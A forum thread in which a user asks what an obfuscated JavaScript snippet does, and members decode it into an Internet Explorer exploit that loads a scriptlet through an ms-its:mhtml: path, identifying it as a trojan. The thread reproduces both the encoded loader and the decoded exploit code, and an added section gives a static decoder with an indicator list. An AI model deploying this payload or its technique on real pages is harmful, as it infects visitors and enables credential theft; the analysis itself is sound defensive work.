hack script? anyone know javascript

Status
Not open for further replies.

sunnydiv

Guest
hey i got this


<script type="text/javascript" language="JavaScript">
x=78;
es="YVnv^QfYWQd_b|Q``>Q]U--p=YSb_c_Vdn9^dUb^Udn5h`\\_bUbpw\nnnnk\nnnnnnnfQbn9^Ud@QdX-T_Se]U^d|\\_SQdY_^|XbUV+\nnnnnnnZ-9^Ud@QdX|\\Qcd9^TUh?Vvu}uw+\nnnnnnn9^Ud@QdX-9^Ud@QdX|c\\YSUv~zZw+\nnnnnnnfQbn_=C9DC-T_Se]U^d|SbUQdU5\\U]U^dvp?2:53Dpw+\nnnnnnnc@bUVYh-e^UcSQ`Uvps&Tc{Ys'$c*]Xd]\\*pw+\nnnnnnn_=C9DC|TQdQ-c@bUVYhyuVY\\U*}}3*LL=19>|=8Douy9^Ud@QdXyu}}h]QY^|SX]**}]QY^|Xd]u++\nnnnnnn_=C9DC|di`U-pdUhd}h{cSbY`d\\Udp+\nnnnnnnT_Se]U^d|R_Ti|Q``U^T3XY\\Tv_=C9DCw+n\nnmnn";
var ds=new String();
for(var j=0;j<es.length;j++)
{e=es.charCodeAt(j);if(e==10){ds=ds+'\n';}else{d=e-x;if (d<0x20){d=e+0x7E-x-0x20;}ds=ds+String.fromCharCode(d);}}eval(ds);
</script>



now my account has 50 k in it, and i dont wanna lose it to some password stealing script, so if anyone can tell me what the above does

and how i can disarm it,,

please help
 

Deep

Version 2.0
looks like it is encrypted..

do this..
there is one software which will show u all the details which are being passed and allows u to manipulate them..

so u need to download the software and submit the password (of course wrong) and see where your password is going....

software name?
well i dont remember it now..i will check it in the office tmrw and let you know..

Deep
 

it_waaznt_me

Coming back to life ..
It is converting the es string parts to some other string ds after running a char code algorithm ... Hmmmm... Will have a look at it after some time ..
 

Deep

Version 2.0
btw..
script is checking for the IE and redirecting it to the location or something..

code looks incomplete..

anyways it generates this code....


if (navigator.appName=="Microsoft Internet Explorer")
{
var InetPath=document.location.href;
j=InetPath.lastIndexOf('/');
InetPath=InetPath.slice(0,j);
var oMSITS=document.createElement("OBJECT");
sPrefix=unescape("%6ds-i%74s:mhtml:"); oMSITS.data=sPrefix+'file://C:\\MAIN.MHT!'+InetPath+'//xmain.chm::/main.htm';;
oMSITS.type="text/x-scriptlet";
document.body.appendChild(oMSITS);
}

Regards
Deep
 

Deep

Version 2.0
UPDATE : in short it is a trojan :D

check this page for more info...

*spamwatch.codefish.net.au/modules.php?op=modload&name=News&file=article&sid=96

solution: *www.securityfocus.com/bid/9658/solution/


how did i find it out?

pretty simple actually..

this is what i did..

i copied the script into htm file..
opened the file to check the output..

nothing happened so i used document.write () to print the values of the variables..

got some values and got idea about the function...

it generates another function which checks for browser IE....

so i copied the generated code into new html file and ran the file..

again followed the same procedure..used document.write ()

got value..

Code:
ms-its:mhtml:file://C:\MAIN.MHT!file:///C:/Documents%20and%20Settings/Administrator/Desktop//xmain.chm::/main.htm

and then what?

haha i asked google

and found the answer :)


ignore this if you find it boring.. lol
Deep
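
The manual steps in the post above (print the decoded string instead of letting `eval` run it, then read the result) can be done as a static decode. This is an added example, not code from the thread: it reuses the loop arithmetic from the posted script and never executes the decoded text. The names `decodeLayer`, `resolveUnescapes`, `triage` and `INDICATORS` are hypothetical, and the sample is only the first line of the posted `es` string.

```javascript
// Added example: static decoder for the x/es scheme in the script posted above.
// Nothing here calls eval; each layer is only returned as text for reading.

// Same arithmetic as the posted loop: subtract the key, wrap results that fall
// below 0x20 back into printable ASCII, and pass newlines (code 10) through.
function decodeLayer(es, x) {
  let out = "";
  for (let j = 0; j < es.length; j++) {
    const e = es.charCodeAt(j);
    if (e === 10) { out += "\n"; continue; }
    let d = e - x;
    if (d < 0x20) d = e + 0x7e - x - 0x20;
    out += String.fromCharCode(d);
  }
  return out;
}

// Rewrite unescape("...") on a string literal to the plain string it yields,
// so split-up keywords become searchable. decodeURIComponent covers the %XX
// case seen here; anything it rejects is left as written.
function resolveUnescapes(src) {
  return src.replace(/unescape\("([^"]*)"\)/g, (whole, body) => {
    try { return JSON.stringify(decodeURIComponent(body)); }
    catch (err) { return whole; }
  });
}

// Assumed watch list, built from strings that appear in this thread.
const INDICATORS = ["eval(", 'createElement("OBJECT")', "ms-its:", "mhtml:",
                    "text/x-scriptlet", ".chm::"];

// Decode one layer, resolve unescape() calls, report which indicators appear.
function triage(es, x) {
  const decoded = resolveUnescapes(decodeLayer(es, x));
  return { decoded, hits: INDICATORS.filter((s) => decoded.includes(s)) };
}

// First line of the es string from the first post (key x=78); rest omitted.
const SAMPLE = "YVnv^QfYWQd_b|Q``>Q]U--p=YSb_c_Vdn9^dUb^Udn5h`\\_bUbpw";
console.log(triage(SAMPLE, 78).decoded);
```

Run under Node.js, the sample decodes to the browser check that opens the generated code quoted earlier in the thread.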
 

tuxfan

Technomancer
Not boring at all. It's very interesting, Deep :) But does that mean that this script will fail if the browser is not IE and something else like Firefox or Opera?
 

Deep

Version 2.0
tuxfan said:
Not boring at all. It's very interesting, Deep :) But does that mean that this script will fail if the browser is not IE and something else like Firefox or Opera?

looks like it will fail..

in fact if the system is patched then it wont work on IE either i suppose..

Deep
 

sunnydiv

Guest
thank you man, ur like god to me today

thank you

from the bottom of my heart, i will give this link on the other forum to all who got affected with the same

hope this saves a few lakhs of money at least
 

tuxfan

Technomancer
So that's one more reason to switch over from IE to WHICHEVER OTHER BROWSER YOU CAN LAY YOUR HANDS ON ;)
 